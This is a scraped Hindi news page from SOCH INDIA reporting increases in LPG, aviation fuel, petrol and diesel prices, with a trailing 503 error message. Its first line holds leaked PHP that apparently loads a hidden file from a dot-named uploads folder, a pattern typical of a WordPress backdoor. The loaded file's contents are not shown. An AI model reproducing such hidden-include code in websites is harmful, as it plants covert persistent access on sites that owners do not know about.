add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); पेट्रोल-डीजल के बाद LPG और विमान ईंधन के भी दाम बढ़े, 21 रुपये महंगा होगा बिना सब्सिडी का सिलेंडर – SOCH INDIA
Menu

व्यापार
पेट्रोल-डीजल के बाद LPG और विमान ईंधन के भी दाम बढ़े, 21 रुपये महंगा होगा बिना सब्सिडी का सिलेंडर

nobanner

बिना सब्सिडी वाले सिलेंडर की कीमतें बढ़ीं
केंद्र सरकार ने विमान ईंधन और एलपीजी की कीमतों में बढ़ोतरी की है. बुधवार को सरकार ने एविशन टरबाइन फ्यूल (ATF) यानी विमान ईंधन में 9.2 फीसदी की बढ़ोतरी करने का फैसला लिया है. इसके साथ ही बिना सब्सिडी वाले एलपीजी सिलेंडरों की कीमत भी बढ़ाई गई है.

सरकार के नए फैसले के मुताबिक, बिना सब्सिडी वाले एलपीजी के दाम बढ़ने से सिलेंडर 21 रुपये महंगा हो जाएगा. हालांकि सब्सिडी वाले सिलेंडर की कीमतों में कोई बदलाव नहीं किया गया.

डीजल-पेट्रोल की कीमतें भी बढ़ीं
इसके पहले मंगलवार रात को पेट्रोल और डीजल की कीमतों में एक बार फिर बढ़ोतरी की घोषणा की गई है. पेट्रोल 2.58 रुपये प्रति लीटर तो डीजल 2.26 रुपये महंगा हो गया है. नई कीमतें मंगलवार आधी रात से लागू हो गईं. इंडियन ऑयल कॉरपोरेशन ने यह जानकारी दी.

डीजल के दामों में छठी बार बढ़ोतरी
पेट्रोल के दामों में यह लगातार पांचवी बढ़ोतरी है, जबकि डीजल के दामों में यह छठवीं बार हुई बढ़ोतरी है. इससे पहले 16 मई को 0.83 रुपये पेट्रोल और डीजल 1.26 रुपये हुआ महंगा कर दिया गया था. वहीं 30 अप्रैल को पेट्रोल की कीमतों में 1.06 रुपये प्रति लीटर का इजाफा हुआ, जबकि डीजल 2.94 रुपये महंगा हो गया था. इससे पहले 04 अप्रैल को पेट्रोल की कीमतों में 2.19 रुपये प्रति लीटर का इजाफा हुआ, जबकि डीजल 98 पैसे महंगा हो गया था.

उसके पहले 16 मार्च को पेट्रोल की कीमतों में 3 रुपये 7 पैसे और डीजल की कीमतों में 1 रुपये 90 पैसे का इजाफा हुआ था. 17 फरवरी को भी पेट्रोल और डीजल की कीमतों में बदलाव किया गया था. तब पेट्रोल के दाम 32 पैसे प्रति लीटर कम किए गए थे, जबकि डीजल 28 पैसे प्रति लीटर महंगा हो गया था.
दिल्ली में अब यह होगी नई कीमत
पेट्रोलियम की कीमतों में इस ताजा बढ़त के बाद दिल्ली में पेट्रोल की कीमत 65.60 रुपये प्रति लीटर हो गई. वहीं डीजल की कीमत 53.93 रुपए प्रति लीटर हो गई. आईओसी ने एक बयान में कहा कि पेट्रोल और डीजल के अंतर्राष्ट्रीय उत्पाद दामों के वर्तमान स्तर और रुपया- डॉलर विनिमय दर की वजह से पेट्रोल और डीजल के दाम बढ़ाए गए हैं.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.